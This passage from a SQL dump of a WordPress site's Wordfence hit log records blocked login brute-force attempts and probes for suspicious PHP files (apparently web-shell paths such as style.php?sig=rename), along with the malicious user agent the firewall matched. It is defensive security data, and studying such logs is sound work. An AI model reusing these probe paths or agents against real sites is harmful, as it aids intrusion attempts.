Network',NULL),(15499,0.000000,1704923054.869769,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15500,1704923543.944905,1704923543.844800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15501,1704923543.933366,1704923543.832500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15479,1704919658.405578,1704919658.301200,'\0\0\0\0\0\0\0\0\0\0[\\j',0,403,0,0,0,'https://tummyrevolution.com/sample.php?pd=1&mapname=ova-tools.xml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NhbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15495,1704922581.801535,1704922581.707300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15496,1704922581.790109,1704922581.707300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15497,0.000000,1704923048.610382,'\0\0\0\0\0\0\0\0\0\0э\"*',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15480,1704919644.914387,1704919644.832500,'\0\0\0\0\0\0\0\0\0\0[\\j',0,403,0,0,0,'https://tummyrevolution.com/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15491,1704921650.973286,1704921650.828800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15492,0.000000,1704922122.472216,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15493,0.000000,1704922122.453912,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15494,0.000000,1704922494.625782,'\0\0\0\0\0\0\0\0\0\0} ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15481,0.000000,1704920231.574029,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15482,0.000000,1704920231.625962,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15483,1704920720.960099,1704920720.850800,'\0\0\0\0\0\0\0\0\0\03ޞ',0,403,0,0,0,'https://tummyrevolution.com/chosen.php?p=',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15490,1704921650.982234,1704921650.828300,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15400,1704906336.772273,1704906336.672900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15396,0.000000,1704905439.341034,'\0\0\0\0\0\0\0\0\0\0j&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15397,0.000000,1704905861.501848,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15398,0.000000,1704905861.573891,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15399,1704906336.793566,1704906336.670800,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15395,1704905387.193700,1704905387.076900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15374,1704901576.158616,1704901576.047000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15375,0.000000,1704901937.253215,'\0\0\0\0\0\0\0\0\0\0|!',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15393,0.000000,1704905209.293507,'\0\0\0\0\0\0\0\0\0\0Vh',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15394,1704905387.194506,1704905387.078000,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15372,0.000000,1704901096.451475,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15373,1704901576.191417,1704901576.053900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15377,0.000000,1704902052.888822,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15378,0.000000,1704902123.398520,'\0\0\0\0\0\0\0\0\0\0G5N',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15379,0.000000,1704902330.030396,'\0\0\0\0\0\0\0\0\0\0э1q',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15380,1704902529.243384,1704902529.126900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15381,1704902529.214175,1704902529.125700,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15371,0.000000,1704901096.472674,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15370,1704900616.331423,1704900616.221200,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15376,0.000000,1704902052.996022,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15369,1704900616.365928,1704900616.222500,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15385,1704903483.005293,1704903482.910900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15368,1704900846.587821,1704900846.482800,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15382,0.000000,1704903020.069516,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15383,0.000000,1704903019.976684,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15384,1704903483.026123,1704903482.938900,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15386,0.000000,1704903695.680781,'\0\0\0\0\0\0\0\0\0\0-N',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15367,1704900847.045593,1704900846.957500,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/sample.php?pd=1&mapname=ova-tools.xml','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NhbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(15599,0.000000,1704966506.700951,'\0\0\0\0\0\0\0\0\0\0\\P',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15600,0.000000,1704966718.603144,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15601,0.000000,1704967373.378326,'\0\0\0\0\0\0\0\0\0\0_a\Z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15602,0.000000,1704968261.262925,'*PT\0e',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15603,0.000000,1704969992.800116,'\0\0\0\0\0\0\0\0\0\0E7D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15604,0.000000,1704970022.667519,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15605,0.000000,1704971792.646519,'\0\0\0\0\0\0\0\0\0\03k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15606,0.000000,1704972721.153541,'\0\0\0\0\0\0\0\0\0\0٠J',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0','loginFailValidUsername',NULL,NULL),(15607,0.000000,1704972757.605292,'\0\0\0\0\0\0\0\0\0\0՘h',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15608,0.000000,1704973596.577254,'\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15609,0.000000,1704975495.766446,'\0\0\0\0\0\0\0\0\0\0EY',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15610,0.000000,1704976362.376632,'\0\0\0\0\0\0\0\0\0\0э\"*',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15611,0.000000,1704976707.819158,'\0\0\0\0\0\0\0\0\0\0b8',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15612,0.000000,1704977255.661192,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15613,0.000000,1704978007.879967,' A\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15614,0.000000,1704978068.687249,'\0\0\0\0\0\0\0\0\0\0z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15615,1704979000.344842,1704979000.276200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/radio.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15635,0.000000,1704987817.836156,'\0\0\0\0\0\0\0\0\0\06',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15636,0.000000,1704988849.291689,'\0\0\0\0\0\0\0\0\0\0_4',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15637,0.000000,1704989095.137725,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15616,1704978996.413414,1704978996.332600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/general.php?pd=1&mapname=op.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2dlbmVyYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(15627,1704982858.315054,1704982858.239600,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15626,0.000000,1704982692.107608,'\0\0\0\0\0\0\0\0\0\0Hӱ',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(15617,1704978986.902940,1704978986.844500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/style.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(15638,0.000000,1704990924.191550,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14226,1704510858.066595,1704510857.976700,' D\0A0ȳ',0,403,0,0,0,'https://tummyrevolution.com/class.api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 